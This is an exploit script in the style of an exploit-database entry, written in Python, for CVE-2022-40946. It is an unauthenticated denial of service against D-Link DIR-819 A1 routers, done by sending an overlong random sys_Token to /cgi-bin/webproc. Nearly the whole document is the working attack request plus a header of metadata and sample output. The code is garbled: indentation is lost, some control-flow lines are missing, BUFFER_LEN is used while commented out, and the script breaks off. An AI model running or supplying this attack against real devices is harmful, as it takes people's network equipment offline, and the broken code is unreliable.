# Exploit Title: DLink DIR 819 A1 - Denial of Service   
# Date: 30th September, 2022  
# Exploit Author: @whokilleddb (  
# Vendor Homepage:  
# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)  
# Tested on: Firmware Version - 1.06 Hardware Version - A1  
# CVE : CVE-2022-40946  
# Github:  
# $ ./ -i   
# [+] DLink DIR-819 DoS exploit  
# [i] Address to attack:  
# [i] Using SSL: False  
# [i] Request Timeout: 30s  
# [i] Buffer Length: 19  
# [i] Payload:  
# [+] Exploit Successful!  
#!/usr/bin/env python3  
import sys  
import string  
import urllib3  
import requests  
import argparse  
import random  
import socket  
from rich import print  
# Disable SSL Warnings  
# Globals  
TIMEOUT = 30  
#BUFFER_LEN = 19  
# Class to exploit  
class Exploit:  
def __init__(self, ip, is_ssl):  
"""Initialize the constructor"""  
self.ip = ip  
self.is_ssl = is_ssl  
_payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"  
if self.is_ssl:  
self.payload = f"https://{_payload}"  
self.payload = f"http://{_payload}"  
def show(self):  
"""Show the parameters"""  
print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")  
print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")  
print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")  
print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")  
print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")  
def run(self):  
"""Run the exploit"""  
print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")  
r = requests.get(self.payload, verify=False, timeout=TIMEOUT)  
if "Internal Error" in r.text:  
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")  
print(f"[bold][[green]+[/green]] Router services must be down![/bold]")  
print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")   
except requests.exceptions.Timeout:  
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")  
except Exception as e:  
print(f"Error occured as: {e}")  
def main():  
"""Main function to run"""  
parser = argparse.ArgumentParser(  
description="DLink DIR-819 Unauthenticated DoS")  
parser.add_argument('-i', '--ip', required=True, help="IP of the router")  
parser.add_argument('-s', '--ssl', required=False, action="store_true")  
opts = parser.parse_args()  
ip = socket.gethostbyname(opts.ip)  
except socket.error:  
print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)  
is_ssl = opts.ssl  
exploit = Exploit(ip, is_ssl)  
if __name__ == '__main__':